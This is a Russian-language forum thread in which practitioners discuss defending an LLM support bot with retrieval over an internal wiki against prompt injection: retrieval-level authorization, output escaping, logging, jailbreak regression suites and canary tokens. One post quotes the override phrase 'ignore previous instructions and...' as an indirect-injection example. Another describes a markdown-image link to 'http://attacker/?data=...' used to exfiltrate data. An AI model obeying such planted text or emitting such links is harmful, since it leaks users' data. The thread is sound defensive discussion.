LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Рейтинг: 36.3% · 19 голосов
Этичный хакинг и тестирование на проникновение: OWASP Top 10, анализ уязвимостей, bug bounty, разбор CVE, защита веб-приложений и сетей.
Аватара пользователя
arich
Сообщения: 22
Зарегистрирован: 20 май 2026, 16:04

LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение arich »

Прикрутили в саппорт-бота RAG поверх внутренней вики. ИБшники подняли вопрос про prompt injection: пользователь может через сообщение вытащить системный промпт или заставить бота лезть в чужие данные. Как у вас с этим, есть рабочие практики?
👍 ❤️ 🔥 😄1 🤔
✔ Лучший ответ сформирован автоматически — llamaguru
Добавлю слой, который в треде не прозвучал: полное логирование входов и выходов модели. Когда инъекция всё-таки пролезет — а она пролезет, — без логов вы даже не восстановите, что произошло и какие данные ушли. И второе: исходите из того, что системный промпт — публичный документ. Никаких внутренних URL, имён сервисов и тем более ключей там быть не должно, тогда его утечка из инцидента…
Перейти к ответу →
Аватара пользователя
heckman
Сообщения: 62
Зарегистрирован: 12 май 2026, 19:39

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение heckman »

Главное правило — не давайте модели прав, которых вы бы не дали анонимному юзеру. Авторизация и фильтрация данных должны быть НА УРОВНЕ retrieval, до того как контекст уйдёт в LLM. Сам промпт защитить нельзя, его рано или поздно вытащат.
👍 ❤️ 🔥 😄 🤔
Аватара пользователя
clickhouseops
Сообщения: 9
Зарегистрирован: 12 май 2026, 17:56

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение clickhouseops »

Indirect prompt injection самое злое — когда инструкция спрятана в документе который попадает в RAG. Юзер вроде ничего плохого не писал, а в подгруженной странице 'ignore previous instructions and...'. Тестируйте именно этот вектор.
👍 ❤️ 🔥 😄1 🤔
Аватара пользователя
k8s4
Сообщения: 5
Зарегистрирован: 14 май 2026, 19:24

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение k8s4 »

А guardrails-модели типа Llama Guard или промпт-классификаторы на входе помогают вообще?
👍2 ❤️ 🔥 😄1 🤔3
Аватара пользователя
Sdgator
Сообщения: 59
Зарегистрирован: 12 май 2026, 01:12

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение Sdgator »

Помогают снизить процент, но это не граница безопасности, а фильтр шума. Закладываться на то что классификатор поймает все джейлбрейки нельзя, обходят регулярно. Это defense in depth, один из слоёв.
👍1 ❤️ 🔥 😄2 🤔
Аватара пользователя
pandas4
Сообщения: 36
Зарегистрирован: 15 май 2026, 08:41

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение pandas4 »

Понял, значит делаем строгий tenant-скоупинг на этапе поиска по вектору и не даём боту инструментов с записью. Вывод тоже санитизировать перед рендером в html?
👍2 ❤️ 🔥 😄 🤔
Аватара пользователя
kingpaul
Сообщения: 57
Зарегистрирован: 11 май 2026, 12:35

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение kingpaul »

Обязательно. Был кейс с markdown-картинкой ![](http://attacker/?data=...) — модель вставляет ссылку, браузер пользователя сам сливает данные на сервер атакующего. Экранируй вывод как недоверенный, всегда.
👍 ❤️ 🔥 😄 🤔
Аватара пользователя
sainty
Сообщения: 94
Зарегистрирован: 11 май 2026, 02:57

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение sainty »

Ещё накидайте свой набор jailbreak-пейлоадов в CI и гоняйте на каждый деплой. У нас живёт regression-сьют из ~200 атак, ловит когда кто-то ослабил системный промпт.
👍 ❤️2 🔥 😄 🤔1
Аватара пользователя
llamaguru
Сообщения: 18
Зарегистрирован: 15 май 2026, 19:19

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение llamaguru »

✔ Лучший ответ — сформирован автоматически
Добавлю слой, который в треде не прозвучал: полное логирование входов и выходов модели. Когда инъекция всё-таки пролезет — а она пролезет, — без логов вы даже не восстановите, что произошло и какие данные ушли. И второе: исходите из того, что системный промпт — публичный документ. Никаких внутренних URL, имён сервисов и тем более ключей там быть не должно, тогда его утечка из инцидента превращается в мелкую неприятность.
👍1 ❤️1 🔥 😄2 🤔
Аватара пользователя
depechie
Сообщения: 67
Зарегистрирован: 11 май 2026, 11:32

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение depechie »

@sainty, а как вы оцениваете результаты прогона — руками или автоматом? Мы пришли к канарейкам: в системный промпт кладётся уникальный токен, и CI просто грепает его в ответах на весь сьют атак. Дёшево, ноль ложных срабатываний, и не нужен LLM-судья для базового кейса «вытащили промпт». Судью гоняем вторым слоем только на хитрые сценарии типа подмены роли, где точного матча не хватает.
👍 ❤️ 🔥 😄1 🤔
Ответить
Поделиться темой: ✈ Telegram VK

Вернуться в «Кибербезопасность и пентест»

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и 1 гость